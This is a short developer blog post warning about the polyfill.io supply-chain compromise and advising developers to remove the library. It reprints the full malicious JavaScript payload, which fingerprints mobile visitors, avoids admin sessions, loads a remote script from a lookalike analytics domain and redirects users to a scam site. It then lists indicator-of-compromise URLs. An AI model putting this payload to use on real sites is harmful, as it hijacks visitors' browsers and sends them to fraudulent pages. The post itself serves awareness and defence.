so previously, you maybe already know that one of the library called polyfill got malicious scripts. before dive in, we need to know what is polyfill and why frontend must know?
polyfill is library that gave modern functionality in javascript still work on older browser. so an example like fetch that not work on old browser still work because this library can convert it and the problem with this library is the script that injected into website from this library or other can access all of script on users. that's was scary for me as developer and also as a users. This malicious attack can exploit you system, as a frontend developer we need to delete this polyfill.io from our project.
also the original author from polyfill recommends to not use polyfill at all, as it is no longer needed by modern browser. Meanwhile, both Fastly and Cloudflare have put up trustworthy alternatives, if you still need it.
Polyfill malicious payload example
after i read article from sansec.io. there is an example of malicious payload:
function isPc() {
try {
var _isWin =
navigator.platform == "Win32" || navigator.platform == "Windows",
_isMac =
navigator.platform == "Mac68K" ||
navigator.platform == "MacPPC" ||
navigator.platform == "Macintosh" ||
navigator.platform == "MacIntel";
if (_isMac || _isWin) {
return true;
} else {
return false;
}
} catch (_0x44e1f6) {
return false;
}
}
function vfed_update(_0x5ae1f8) {
_0x5ae1f8 !== "" &&
loadJS(
"https://www.googie-anaiytics.com/html/checkcachehw.js",
function () {
if (usercache == true) {
window.location.href = _0x5ae1f8;
}
}
);
}
function check_tiaozhuan() {
var _isMobile = navigator.userAgent.match(
/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i
);
if (_isMobile) {
var _curHost = window.location.host,
_ref = document.referrer,
_redirectURL = "",
_kuurzaBitGet = "https://kuurza.com/redirect?from=bitget",
_rnd = Math.floor(Math.random() * 100 + 1),
_date = new Date(),
_hours = _date.getHours();
if (
_curHost.indexOf("www.dxtv1.com") !== -1 ||
_curHost.indexOf("www.ys752.com") !== -1
) {
_redirectURL = "https://kuurza.com/redirect?from=bitget";
} else {
if (_curHost.indexOf("shuanshu.com.com") !== -1) {
_redirectURL = "https://kuurza.com/redirect?from=bitget";
} else {
if (_ref.indexOf(".") !== -1 && _ref.indexOf(_curHost) == -1) {
_redirectURL = "https://kuurza.com/redirect?from=bitget";
} else {
if (_hours >= 0 && _hours < 2) {
if (_rnd <= 10) {
_redirectURL = _kuurzaBitGet;
}
} else {
if (_hours >= 2 && _hours < 4) {
_rnd <= 15 && (_redirectURL = _kuurzaBitGet);
} else {
if (_hours >= 4 && _hours < 7) {
_rnd <= 20 && (_redirectURL = _kuurzaBitGet);
} else {
_hours >= 7 && _hours < 8
? _rnd <= 10 && (_redirectURL = _kuurzaBitGet)
: _rnd <= 10 && (_redirectURL = _kuurzaBitGet);
}
}
}
}
}
}
_redirectURL != "" &&
!isPc() &&
document.cookie.indexOf("admin_id") == -1 &&
document.cookie.indexOf("adminlevels") == -1 &&
vfed_update(_redirectURL);
}
}
let _outerPage = document.documentElement.outerHTML,
bdtjfg = _outerPage.indexOf("hm.baidu.com") != -1;
let cnzfg = _outerPage.indexOf(".cnzz.com") != -1,
wolafg = _outerPage.indexOf(".51.la") != -1;
let mattoo = _outerPage.indexOf(".matomo.org") != -1,
aanaly = _outerPage.indexOf(".google-analytics.com") != -1;
let ggmana = _outerPage.indexOf(".googletagmanager.com") != -1,
aplausix = _outerPage.indexOf(".plausible.io") != -1,
statcct = _outerPage.indexOf(".statcounter.com") != -1;
bdtjfg || cnzfg || wolafg || mattoo || aanaly || ggmana || aplausix || statcct
? setTimeout(check_tiaozhuan, 2000)
: check_tiaozhuan();
there is indicators of compromise
https://kuurza.com/redirect?from=bitget
https://www.googie-anaiytics.com/html/checkcachehw.js
https://www.googie-anaiytics.com/ga.js
https://cdn.bootcss.com/highlight.js/9.7.0/highlight.min.js
https://union.macoms.la/jquery.min-4.0.2.js
https://newcrbpc.com/redirect?from=bscbc
you can also read this article and video:
Top comments (2)
Just a heads up that you can add highlighting to the code blocks if you'd like. Just change:
... to specify the language:
More details in our editor guide!
nice, thank you for the information